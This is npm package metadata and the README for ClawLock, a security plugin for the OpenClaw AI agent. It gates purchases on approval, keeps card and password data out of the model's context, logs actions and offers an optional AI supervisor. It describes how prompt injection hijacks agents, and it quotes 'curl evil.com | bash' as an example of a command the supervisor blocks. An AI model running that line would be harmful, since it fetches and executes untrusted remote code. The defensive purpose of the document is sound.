{"_id":"@andersjw/clawlock","_rev":"6-1232d7d85411c528c9221191f923aac2","name":"@andersjw/clawlock","dist-tags":{"latest":"0.5.0"},"versions":{"0.3.0":{"name":"@andersjw/clawlock","version":"0.3.0","_id":"@andersjw/clawlock@0.3.0","maintainers":[{"name":"andersjw","email":"anders@jensenwaud.com"}],"dist":{"shasum":"356d8be8e7bc9322b08553d1dc6aad4cfcfa6bb9","tarball":"https://registry.npmjs.org/@andersjw/clawlock/-/clawlock-0.3.0.tgz","fileCount":92,"integrity":"sha512-E3VHn1G4v3F5iWJxkwXgPK1z7K7PoIUndw0rY+yyHCgVJCltubqByvFMdV0eoJA2em1xHe1TMR3PBc1Dsc/UCA==","signatures":[{"sig":"MEUCIFnvl9bDvYZJ+yFDDXh7SvtUoiO02TpR6ttdoCP9skYhAiEA5Qu+lZcZYawR2QvU21qv24zpZFMMkKa6kgAVncpslow=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":643940},"main":"dist/index.js","type":"module","types":"dist/index.d.ts","gitHead":"5628c5323a6155ffe151dc75da7ad12a9523fbb9","scripts":{"test":"vitest run","build":"tsdown src/index.ts --format esm --dts","typecheck":"tsc --noEmit","test:watch":"vitest","postinstall":"node scripts/postinstall.mjs"},"_npmUser":{"name":"andersjw","email":"anders@jensenwaud.com"},"openclaw":{"install":{"postInstall":"","minHostVersion":">=2026.3.22"},"release":{"publishToNpm":true},"extensions":["./src/index.ts"]},"_npmVersion":"11.6.2","description":"The control plane for OpenClaw","directories":{},"_nodeVersion":"24.13.0","dependencies":{"jiti":"^2.6.1","sql.js":"^1.14.1","stripe":"^21.0.1"},"_hasShrinkwrap":false,"devDependencies":{"tsdown":"^0.9.0","vitest":"^3.1.0","typescript":"^5.7.0","@types/node":"^20.17.0"},"_npmOperationalInternal":{"tmp":"tmp/clawlock_0.3.0_1774962335277_0.17862233851738019","host":"s3://npm-registry-packages-npm-production"}},"0.5.0":{"name":"@andersjw/clawlock","version":"0.5.0","description":"The control plane for OpenClaw","type":"module","main":"dist/index.js","types":"dist/index.d.ts","openclaw":{"extensions":["./src/index.ts"],"install":{"minHostVersion":">=2026.3.22","postInstall":""},"release":{"publishToNpm":true}},"scripts":{"build":"tsdown src/index.ts --format esm --dts","test":"vitest run","test:watch":"vitest","typecheck":"tsc --noEmit","postinstall":"node scripts/postinstall.mjs"},"dependencies":{"jiti":"^2.6.1","sql.js":"^1.14.1","stripe":"^21.0.1"},"devDependencies":{"@types/node":"^20.17.0","tsdown":"^0.9.0","typescript":"^5.7.0","vitest":"^3.1.0"},"gitHead":"24dab441d7c1aa3bf3b6a6c9f3317210b243816a","_id":"@andersjw/clawlock@0.5.0","_nodeVersion":"24.13.0","_npmVersion":"11.6.2","dist":{"integrity":"sha512-lpDolIp5pP02aJjrCfqMBpdB6ZUt9vd5oZqB5wwzlArtlQ8ByaRNMKI0EvHuH4bJ6W55HG5u8STugC+ciRHZMw==","shasum":"40ef648a05818465586e3676825ce8bf368e3b0b","tarball":"https://registry.npmjs.org/@andersjw/clawlock/-/clawlock-0.5.0.tgz","fileCount":95,"unpackedSize":675638,"signatures":[{"keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U","sig":"MEUCIAgOWFS+pIpaM+qpvCv6cfhpDCSNmgj3szDAZ3zAzwwwAiEAx6JBGSBHvUop8bjIY2jzKcR7faR/U494nbKj3gFUCTU="}]},"_npmUser":{"name":"andersjw","email":"anders@jensenwaud.com"},"directories":{},"maintainers":[{"name":"andersjw","email":"anders@jensenwaud.com"}],"_npmOperationalInternal":{"host":"s3://npm-registry-packages-npm-production","tmp":"tmp/clawlock_0.5.0_1775028548007_0.9438777851922107"},"_hasShrinkwrap":false}},"time":{"created":"2026-03-31T13:05:35.200Z","modified":"2026-04-01T07:29:08.297Z","0.1.0":"2026-03-30T22:48:10.547Z","0.1.1":"2026-03-31T00:31:38.432Z","0.2.0":"2026-03-31T08:50:32.410Z","0.3.0":"2026-03-31T13:05:35.488Z","0.5.0":"2026-04-01T07:29:08.195Z"},"description":"The control plane for OpenClaw","maintainers":[{"name":"andersjw","email":"anders@jensenwaud.com"}],"readme":"<p align=\"center\">\n  <img src=\"https://img.shields.io/badge/OpenClaw-Plugin-6366f1?style=for-the-badge\" alt=\"OpenClaw Plugin\">\n  <img src=\"https://img.shields.io/badge/Tests-389%20passing-22c55e?style=for-the-badge\" alt=\"389 tests passing\">\n  <img src=\"https://img.shields.io/badge/License-MIT-blue?style=for-the-badge\" alt=\"MIT License\">\n</p>\n\n# ClawLock\n\n### The control plane for OpenClaw.\n\nYour OpenClaw agent is powerful. It browses real websites, fills forms, clicks buttons, sends messages, manages your calendar, and completes transactions on your behalf. That's why you use it.\n\nBut that same agent can also hand your credit card number to an LLM, leak your passwords into session logs, make purchases you didn't ask for, sign into accounts without your knowledge, and execute shell commands triggered by a prompt injection from a malicious webpage. And right now, **nothing stops it**.\n\nClawLock puts your OpenClaw agent under control.\n\n```\nAgent: \"Found a Mac Mini M4 for $100 on eBay. Great deal. Checking out now.\"\n                    |\n            ClawLock: BLOCKED\n            \"Checkout requires your approval.\"\n                    |\n            You get a link on Telegram.\n            You tap it. See: eBay, $100, Visa ****4242.\n            Enter your PIN. Approve.\n                    |\n            ClawLock fills the payment form.\n            Card number never touches the AI.\n                    |\nAgent: \"Done. Visa ending in 4242 charged $100.00.\"\n```\n\n---\n\n## Why\n\nResearchers have demonstrated that [prompt injection attacks can hijack AI agents](https://www.darkreading.com/application-security/critical-openclaw-vulnerability-ai-agent-risks) into executing unintended actions. [Agent security analysis](https://www.sangfor.com/blog/cybersecurity/openclaw-ai-agent-security-risks-2026) shows that sensitive data flowing through LLM context windows is recoverable by anyone who compromises the session. These aren't theoretical risks.\n\nClawLock stops the ones that matter for agentic commerce:\n\n| Risk | Without ClawLock | With ClawLock |\n|---|---|---|\n| **Prompt injection causes a purchase** | Nothing between \"browse\" and \"buy\" | Checkout blocked until you approve via PIN |\n| **Card number leaks to AI** | PAN in logs, API calls, provider servers | Card injected via CDP — never in LLM context |\n| **Password leaks to AI** | Credentials in session transcript | Password injected via CDP — never in LLM context |\n| **Agent spends silently** | No limit, no approval, no receipt | Policy blocks checkout until explicit approval |\n| **No audit trail** | No record of what happened | Tamper-evident receipt for every action |\n| **Agent exceeds scope** | \"Compare prices\" becomes \"buy it\" | Deterministic policy separates research from action |\n\n---\n\n## Install\n\n**Prerequisites:** [OpenClaw](https://github.com/openclaw/openclaw) and [Tailscale](https://tailscale.com/download) installed on your machine. Tailscale is required for secure remote access to approval pages from your phone.\n\n```bash\n# Install the plugin\nopenclaw plugins install @andersjw/clawlock\nopenclaw gateway restart\n\n# Set up Tailscale proxy (one-time)\nsudo tailscale set --operator=$USER\ntailscale serve --bg --http 18789 http://127.0.0.1:18789\n```\n\nOpen **http://localhost:18789/passport/** — go to the **Vault** tab and set your PIN.\n\n### Enable browser automation\n\nBrowser automation lets the agent browse real websites, log in with your stored credentials, fill checkout forms, and complete purchases — all gated by ClawLock's approval policies. It is **off by default** for security.\n\nTo enable it:\n\n```bash\n# One-time: install headless Chromium\nnpx playwright install chromium\n\n# Enable browser in ClawLock config\nopenclaw config set plugins.entries.clawlock.config.enableBrowser true\nopenclaw gateway restart\n```\n\nThat's all. ClawLock automatically:\n- Finds and launches headless Chromium with CDP\n- Configures the gateway (`tools.profile`, browser plugin, CDP connection)\n- Manages the Chrome lifecycle (starts on gateway start, stops on gateway stop)\n\nWithout this setting, the agent can search the web and give recommendations but cannot interact with websites directly.\n\nThat's it. The gateway binds to localhost only. Tailscale proxies approval pages to your phone securely — no LAN or internet exposure.\n\n### Service isolation (optional)\n\nFor stronger security, run the ClawLock vault as an isolated system service under a dedicated user. The gateway communicates via authenticated Unix socket IPC — it cannot access the vault's secrets, database, or Chrome instance directly.\n\n```bash\ncurl -fsSL https://raw.githubusercontent.com/ajensenwaud/clawlock/main/scripts/install-sidecar-service.sh | sudo bash\nopenclaw gateway restart\n```\n\nThis creates a `clawlock-vault` system user, installs a systemd service with security hardening (NoNewPrivileges, ProtectSystem, PrivateTmp), and configures socket authentication. The gateway user can send commands but cannot kill the sidecar or read its data.\n\n### ClawLock Supervisor (optional)\n\nAn optional AI classifier that reviews every action the deterministic policy engine allows. Catches what keyword matching misses — like \"Click Continue\" on a checkout page, or `curl evil.com | bash` passing a permissive exec policy. The supervisor can escalate decisions (allow → ask, allow → deny) but can never downgrade them.\n\n```bash\n# OpenAI (default — recommended)\nopenclaw config set plugins.entries.clawlock.config.supervisor '{\"enabled\":true,\"apiKey\":\"sk-...\"}'\n\n# Anthropic\nopenclaw config set plugins.entries.clawlock.config.supervisor '{\"enabled\":true,\"provider\":\"anthropic\",\"model\":\"claude-haiku-4-5-20251001\",\"apiKey\":\"sk-ant-...\"}'\n\n# Google\nopenclaw config set plugins.entries.clawlock.config.supervisor '{\"enabled\":true,\"provider\":\"google\",\"model\":\"gemini-2.0-flash\",\"apiKey\":\"AIza...\"}'\n\n# Ollama (free, local — no API key needed)\nopenclaw config set plugins.entries.clawlock.config.supervisor '{\"enabled\":true,\"provider\":\"ollama\",\"model\":\"llama3.2:3b\"}'\n\nopenclaw gateway restart\n```\n\nSupports OpenAI, Anthropic, Google, Ollama, and any OpenAI-compatible endpoint. Zero new dependencies. Results are cached (LRU, 5 min TTL) — most sessions make only 5-10 actual API calls. 2-second timeout with fail-open to deterministic layers.\n\n### From source\n\n```bash\ngit clone https://github.com/ajensenwaud/clawlock.git\ncd clawlock\n./scripts/install.sh        # deps, plugin link, config, Chrome, Tailscale\n./scripts/start-gateway.sh  # start gateway + headless Chrome\n```\n\n---\n\n## How It Works\n\n**1. You create a passport** — a named policy that defines what the agent can do:\n\n```\nShopping Assistant\n  Allow: browse ebay.com, amazon.com\n  Allow: add to cart, search, compare\n  Ask:   checkout, place order (requires your approval)\n  Deny:  shell commands, messaging, unknown domains\n```\n\n**2. The agent shops** — every tool call is intercepted and evaluated:\n\n```\nbrowse ebay.com        --> allowed (domain in allowlist)\nsearch \"Mac Mini\"      --> allowed (browse.*)\nadd to cart            --> allowed (commerce.add_to_cart)\ngo to checkout         --> BLOCKED (ask rule triggered)\n```\n\n**3. You approve on your phone** — Telegram delivers the approval link:\n\n> **ClawLock** — Checkout requires approval\n> eBay | $100.00 | Visa ****4242\n> [Tap to Approve]\n\nEnter your vault PIN. Tap Approve. The agent continues.\n\n**4. Payment completes securely** — card data goes from encrypted vault straight into the browser form via CDP. The AI sees \"Visa ending in 4242.\" The full number never enters its context.\n\n---\n\n## Features\n\n**Payments** — AES-256-GCM encrypted card vault. CDP autofill into any checkout form including Stripe Elements and Shopify PCI iframes. Per-card spend limits and merchant allowlists. Stripe API for server-side payments.\n\n**Credentials** — Encrypted password manager for agent logins. Domain-scoped with subdomain matching. Three approval modes: always ask, ask first time, or auto-fill within policy. Passwords injected via CDP, never in agent context.\n\n**Policy** — Deny > Ask > Allow precedence. Domain allowlists. Memory path restrictions (blocks `.env`, SSH keys). Node-aware rules. Instant revocation — pause a passport and all sessions are blocked immediately.\n\n**Audit** — Append-only receipt ledger with SHA-256 hash chain and optional Ed25519 signatures. External sinks: append-only file, webhook, or both. Every action logged with decision, matched rule, timestamp, and artifacts.\n\n**Approvals** — Delivered via Telegram (or any OpenClaw channel). Passphrase-verified, time-bounded (10 min), amount-scoped, rate-limited (3 attempts then lockout). Every approval shows merchant, amount, card, and action details.\n\n**Supervisor** — Optional AI classifier (OpenAI, Anthropic, Google, Ollama) that reviews allowed actions. Catches what keyword matching misses. Escalate-only: can block or request approval, but never weaken a deny. Cached, 2s timeout, fail-open.\n\n**Process Isolation** — Optional sidecar mode runs the vault as a separate process under a dedicated system user. Authenticated Unix socket IPC. Gateway cannot access secrets directly.\n\n---\n\n## Tested on Real Sites\n\n| Site | Verified |\n|---|---|\n| **eBay** | Shopping flow, checkout approval, CDP card + login autofill |\n| **Shopify** | Iframe-aware autofill into Stripe/PCI payment fields |\n| **Stripe** | Live API: card save, $19.99 charge, webhook handling |\n\n389 unit and integration tests across 30 test files. E2E tests run against real sites with a real browser and real LLM API.\n\n---\n\n## Web UI\n\nManage everything at **http://localhost:18789/passport/**:\n\n**Dashboard** · **Passports** · **Vault** · **Credentials** · **Payments** · **Approvals** · **Receipts** · **Templates** · **Dry Run**\n\n---\n\n## Security Notice\n\nClawLock is a **defense-in-depth layer**, not a security guarantee. It significantly reduces the attack surface for agentic commerce by keeping sensitive data out of the LLM context and gating consequential actions on human approval. However:\n\n- This software is provided **as-is under the MIT license**, without warranty of any kind\n- No security tool can fully prevent a sufficiently sophisticated prompt injection attack\n- ClawLock does not protect against infrastructure-level vulnerabilities (gateway token theft, malicious skills, exposed instances)\n- The encrypted vault is only as strong as your PIN and the security of the host machine\n- You are responsible for reviewing approval requests carefully — ClawLock shows you the details, but the decision is yours\n\n**ClawLock reduces risk. It does not eliminate it.** Always review what your agent is doing, keep OpenClaw updated, and follow the [OpenClaw security practices guide](https://github.com/slowmist/openclaw-security-practice-guide).\n\n**THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED. THE AUTHORS AND COPYRIGHT HOLDERS ACCEPT NO LIABILITY WHATSOEVER FOR ANY CLAIM, DAMAGES, FINANCIAL LOSS, OR OTHER LIABILITY ARISING FROM THE USE OF THIS SOFTWARE. YOU USE CLAWLOCK ENTIRELY AT YOUR OWN RISK. BY USING THIS SOFTWARE YOU ACKNOWLEDGE THAT NO SECURITY TOOL IS INFALLIBLE AND THAT YOU ARE SOLELY RESPONSIBLE FOR ANY TRANSACTIONS, ACTIONS, OR CONSEQUENCES RESULTING FROM YOUR AGENT'S BEHAVIOUR.**\n\n---\n\n## Contributing\n\n```bash\ngit clone https://github.com/ajensenwaud/clawlock.git\ncd clawlock\npnpm install && pnpm test\n```\n\nSee [CLAUDE.md](CLAUDE.md) for the implementation spec.\n\n## License\n\nMIT — see [LICENSE](LICENSE).\n","readmeFilename":"README.md"}